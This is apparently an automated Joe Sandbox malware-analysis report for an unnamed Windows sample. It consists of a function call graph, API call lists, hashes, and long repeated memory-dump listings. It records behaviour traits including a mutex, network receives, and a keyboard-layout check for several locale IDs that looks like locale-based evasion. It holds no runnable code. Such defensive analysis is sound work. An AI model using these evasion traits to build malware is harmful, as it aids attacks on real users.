13056->13057 13059 b2a98e 13057->13059 13058->13056 13060 b29b4b shared_ptr 13058->13060 13061 b25c10 6 API calls 13060->13061 13062 b29b59 13060->13062 13063 b29b7c 13061->13063 13064 b28b30 6 API calls 13063->13064 13065 b29b8d 13064->13065 13066 b25c10 6 API calls 13065->13066 13067 b29cb1 13066->13067 13068 b28b30 6 API calls 13067->13068 13069 b29cc2 13068->13069 13077 b56a44 13078 b56a52 13077->13078 13079 b56a5c 13077->13079 13082 b5698d 13079->13082 13081 b56a76 ___free_lconv_mon 13083 b5690a __cftof 4 API calls 13082->13083 13084 b5699f 13083->13084 13084->13081 12467 b28780 12468 b28786 12467->12468 12474 b56729 12468->12474 12471 b287a6 12473 b287a0 12481 b56672 12474->12481 12476 b28793 12476->12471 12477 b567b7 12476->12477 12478 b567c3 __cftof 12477->12478 12480 b567cd __cftof 12478->12480 12497 b56740 12478->12497 12480->12473 12482 b5667e __cftof 12481->12482 12483 b56685 __cftof 12482->12483 12485 b5a8c3 12482->12485 12483->12476 12486 b5a8cf __cftof 12485->12486 12489 b5a967 12486->12489 12488 b5a8ea 12488->12483 12490 b5a98a 12489->12490 12492 b5a9d0 ___free_lconv_mon 12490->12492 12493 b5d82f 12490->12493 12492->12488 12495 b5d83c __cftof 12493->12495 12494 b5d867 RtlAllocateHeap 12494->12495 12496 b5d87a 12494->12496 12495->12494 12495->12496 12496->12492 12498 b56762 12497->12498 12499 b5674d __cftof ___free_lconv_mon 12497->12499 12498->12499 12501 b5a038 12498->12501 12499->12480 12502 b5a050 12501->12502 12504 b5a075 12501->12504 12502->12504 12505 b60439 12502->12505 12504->12499 12506 b60445 __cftof 12505->12506 12508 b6044d __cftof __dosmaperr 12506->12508 12509 b6052b 12506->12509 12508->12504 12510 b6054d 12509->12510 12514 b60551 __cftof __dosmaperr 12509->12514 12510->12514 12515 b600d2 12510->12515 12514->12508 12517 b600e3 12515->12517 12516 b60106 12516->12514 12519 b5fcc0 12516->12519 12517->12516 12526 b5a671 12517->12526 12520 b5fd0d 12519->12520 12564 b5690a 12520->12564 12523 b5c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12525 b5fd1c __cftof 12523->12525 12524 b5ffbc __floor_pentium4 12524->12514 12525->12523 12525->12524 12572 b5b67d 12525->12572 12527 b5a67b __cftof 12526->12527 12528 b5d82f __cftof RtlAllocateHeap 12527->12528 12532 b5a694 __cftof ___free_lconv_mon 12527->12532 12528->12532 12529 b5a722 12529->12516 12532->12529 12533 b58bec 12532->12533 12534 b58bf1 __cftof 12533->12534 12538 b58bfc __cftof 12534->12538 12539 b5d634 12534->12539 12553 b565ed 12538->12553 12541 b5d640 __cftof 12539->12541 12540 b5d69c __cftof 12540->12538 12541->12540 12542 b5d726 12541->12542 12543 b5d81b __cftof 12541->12543 12545 b5d751 __cftof 12541->12545 12542->12545 12556 b5d62b 12542->12556 12544 b565ed __cftof 3 API calls 12543->12544 12547 b5d82e 12544->12547 12545->12540 12549 b5a671 __cftof 4 API calls 12545->12549 12551 b5d7a5 12545->12551 12549->12551 12550 b5d62b __cftof 4 API calls 12550->12545 12551->12540 12552 b5a671 __cftof 4 API calls 12551->12552 12552->12540 12559 b564c7 12553->12559 12557 b5a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12556->12557 12558 b5d630 12557->12558 12558->12550 12561 b564d5 __cftof 12559->12561 12560 b56520 12561->12560 12562 b5652b __cftof GetPEB ExitProcess GetPEB 12561->12562 12563 b5652a 12562->12563 12565 b56921 12564->12565 12566 b5692a 12564->12566 12565->12525 12566->12565 12567 b5a671 __cftof 4 API calls 12566->12567 12568 b5694a 12567->12568 12577 b5b5fb 12568->12577 12573 b5a671 __cftof 4 API calls 12572->12573 12574 b5b688 12573->12574 12575 b5b5fb __cftof 4 API calls 12574->12575 12576 b5b698 12575->12576 12576->12525 12578 b56960 12577->12578 12579 b5b60e 12577->12579 12581 b5b628 12578->12581 12579->12578 12585 b5f5ab 12579->12585 12582 b5b650 12581->12582 12583 b5b63b 12581->12583 12582->12565 12583->12582 12592 b5e6b1 12583->12592 12586 b5f5b7 __cftof 12585->12586 12587 b5a671 __cftof 4 API calls 12586->12587 12589 b5f5c0 __cftof 12587->12589 12588 b5f606 12588->12578 12589->12588 12590 b58bec __cftof 4 API calls 12589->12590 12591 b5f62b 12590->12591 12593 b5a671 __cftof 4 API calls 12592->12593 12594 b5e6bb 12593->12594 12597 b5e5c9 12594->12597 12596 b5e6c1 12596->12582 12601 b5e5d5 __cftof ___free_lconv_mon 12597->12601 12598 b5e5f6 12598->12596 12599 b58bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12600 b5e668 12599->12600 12602 b5e6a4 12600->12602 12603 b5a72e __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12600->12603 12601->12598 12601->12599 12602->12596 12604 b5e695 12603->12604 12605 b5e4b0 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12604->12605 12605->12602 12809 b2e0c0 recv 12810 b2e122 recv 12809->12810 12811 b2e157 recv 12810->12811 12813 b2e191 12811->12813 12812 b2e2b3 __floor_pentium4 12813->12812 12818 b3c6ac 12813->12818 12825 b3c452 12818->12825 12820 b2e2ee 12821 b3c26a 12820->12821 12822 b3c292 12821->12822 12823 b3c274 12821->12823 12822->12822 12823->12822 12842 b3c297 12823->12842 12826 b3c4a8 12825->12826 12828 b3c47a __floor_pentium4 12825->12828 12826->12828 12831 b3cf6b 12826->12831 12828->12820 12829 b3c4fd __Xtime_diff_to_millis2 12829->12828 12830 b3cf6b _xtime_get GetSystemTimePreciseAsFileTime 12829->12830 12830->12829 12832 b3cf7a 12831->12832 12834 b3cf87 __aulldvrm 12831->12834 12832->12834 12835 b3cf44 12832->12835 12834->12829 12838 b3cbea 12835->12838 12839 b3cc07 12838->12839 12840 b3cbfb GetSystemTimePreciseAsFileTime 12838->12840 12839->12834 12840->12839 12845 b22ae0 12842->12845 12844 b3c2ae Concurrency::cancel_current_task 12846 b3bedf InitOnceExecuteOnce 12845->12846 12848 b22af4 __cftof 12846->12848 12847 b22aff 12847->12844 12848->12847 12849 b5a671 __cftof 4 API calls 12848->12849 12852 b56ccc 12849->12852 12850 b58bec __cftof 4 API calls 12851 b56cf6 12850->12851 12852->12850 12853 b220c0 12854 b3c68b __Mtx_init_in_situ 2 API calls 12853->12854 12855 b220cc 12854->12855 12910 b28980 12912 b28aea 12910->12912 12913 b289d8 shared_ptr 12910->12913 12911 b25c10 6 API calls 12911->12913 12913->12911 12913->12912 13070 b22e00 13071 b22e28 13070->13071 13072 b3c68b __Mtx_init_in_situ 2 API calls 13071->13072 13073 b22e33 13072->13073 12856 b3d0c7 12857 b3d0d6 12856->12857 12858 b3d17f 12857->12858 12859 b3d17b RtlWakeAllConditionVariable 12857->12859 12870 b23c47 12871 b23c51 12870->12871 12872 b23c5f 12871->12872 12877 b232d0 12871->12877 12874 b23c68 12872->12874 12875 b23810 4 API calls 12872->12875 12876 b23cdb 12875->12876 12878 b3c6ac GetSystemTimePreciseAsFileTime 12877->12878 12885 b23314 12878->12885 12879 b2336b 12880 b3c26a 5 API calls 12879->12880 12881 b2333c __Mtx_unlock 12880->12881 12883 b3c26a 5 API calls 12881->12883 12886 b23350 __floor_pentium4 12881->12886 12884 b23377 12883->12884 12887 b3c6ac GetSystemTimePreciseAsFileTime 12884->12887 12885->12879 12885->12881 12896 b3bd4c 12885->12896 12886->12872 12888 b233af 12887->12888 12889 b3c26a 5 API calls 12888->12889 12890 b233b6 __Cnd_broadcast 12888->12890 12889->12890 12891 b3c26a 5 API calls 12890->12891 12892 b233d7 __Mtx_unlock 12890->12892 12891->12892 12893 b3c26a 5 API calls 12892->12893 12894 b233eb 12892->12894 12895 b2340e 12893->12895 12894->12872 12895->12872 12899 b3bb72 12896->12899 12898 b3bd5c 12898->12885 12900 b3bb9c 12899->12900 12901 b3cf6b _xtime_get GetSystemTimePreciseAsFileTime 12900->12901 12904 b3bba4 __Xtime_diff_to_millis2 __floor_pentium4 12900->12904 12902 b3bbcf __Xtime_diff_to_millis2 12901->12902 12903 b3cf6b _xtime_get GetSystemTimePreciseAsFileTime 12902->12903 12902->12904 12903->12904 12904->12898 13423 b29f44 13424 b29f4c shared_ptr 13423->13424 13425 b2a953 Sleep CreateMutexA 13424->13425 13427 b2a01f shared_ptr 13424->13427 13426 b2a98e 13425->13426 12732 b23c8e 12733 b23c98 12732->12733 12735 b23ca5 12733->12735 12740 b22410 12733->12740 12737 b23ccf 12735->12737 12744 b23810 12735->12744 12738 b23810 4 API calls 12737->12738 12739 b23cdb 12738->12739 12741 b22424 12740->12741 12748 b3b52d 12741->12748 12745 b2381c 12744->12745 12797 b22440 12745->12797 12756 b53aed 12748->12756 12750 b3b5a5 ___std_exception_copy 12763 b3b1ad 12750->12763 12751 b3b598 12759 b3af56 12751->12759 12755 b2242a 12755->12735 12767 b54f29 12756->12767 12758 b3b555 12758->12750 12758->12751 12758->12755 12760 b3af9f ___std_exception_copy 12759->12760 12762 b3afb2 shared_ptr 12760->12762 12773 b3b39f 12760->12773 12762->12755 12764 b3b1d8 12763->12764 12766 b3b1e1 shared_ptr 12763->12766 12765 b3b39f 5 API calls 12764->12765 12765->12766 12766->12755 12768 b54f2e __cftof 12767->12768 12768->12758 12769 b5d634 __cftof 4 API calls 12768->12769 12771 b58bfc __cftof 12768->12771 12769->12771 12770 b565ed __cftof 3 API calls 12772 b58c2f 12770->12772 12771->12770 12784 b3bedf 12773->12784 12776 b3b3e8 12776->12762 12793 b3cc31 12784->12793 12787 b56cbb 12788 b56cc7 __cftof 12787->12788 12789 b5a671 __cftof 4 API calls 12788->12789 12791 b56ccc 12789->12791 12790 b58bec __cftof 4 API calls 12792 b56cf6 12790->12792 12791->12790 12794 b3cc3f InitOnceExecuteOnce 12793->12794 12796 b3b3e1 12793->12796 12794->12796 12796->12776 12796->12787 12800 b3b5d6 12797->12800 12799 b22472 12801 b3b5f1 Concurrency::cancel_current_task 12800->12801 12802 b58bec __cftof 4 API calls 12801->12802 12804 b3b658 __cftof __floor_pentium4 12801->12804 12803 b3b69f 12802->12803 12804->12799
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00B5652A,?,?,?,?,?,00B57661), ref: 00B56567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: d50cbdf7f2b10a6dfeaa1725d379e0c5fc5d991edf3db6e691ea7ba26c4fa7a7
                                                                                                                                                                                                                                                  • Instruction ID: 376daa97bb9310a6dc02ee7d009c3328141a9c37e7eb47ec6547bfa767d8e3fc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d50cbdf7f2b10a6dfeaa1725d379e0c5fc5d991edf3db6e691ea7ba26c4fa7a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE0863005020C6ECE25BB15EC19B5D3B9AEB21746F800880FC1497122DB25FD89D640
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5dacab3de433ae4f06b7d978a1b34fc9cc25d9a703d811f4b94d01013d586b62
                                                                                                                                                                                                                                                  • Instruction ID: 42b04d6535119bd4634fbf83ca262a6d7b8479cfb30888d8d8a41d09219c8e01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dacab3de433ae4f06b7d978a1b34fc9cc25d9a703d811f4b94d01013d586b62
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61112BEB34E011BD795180472B18AFB26AFE7C5730738C426F807C5505E2846E997176

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                  • API String ID: 0-3963862150
                                                                                                                                                                                                                                                  • Opcode ID: ed913349dc81823447f36b318fac568a8dc311c0509481632ac44b67505d3d30
                                                                                                                                                                                                                                                  • Instruction ID: ccb9950106ea43436216e4c3610626c519c6b613dc83452cb6aea9a2705a9eed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed913349dc81823447f36b318fac568a8dc311c0509481632ac44b67505d3d30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEF1D070900258ABEB24DF54CC85BDEBBB9EB44304F5042E9F918A7281DB74AA84CB95

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 219 b29ba5-b29d91 call b37a00 call b25c10 call b28b30 call b38220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
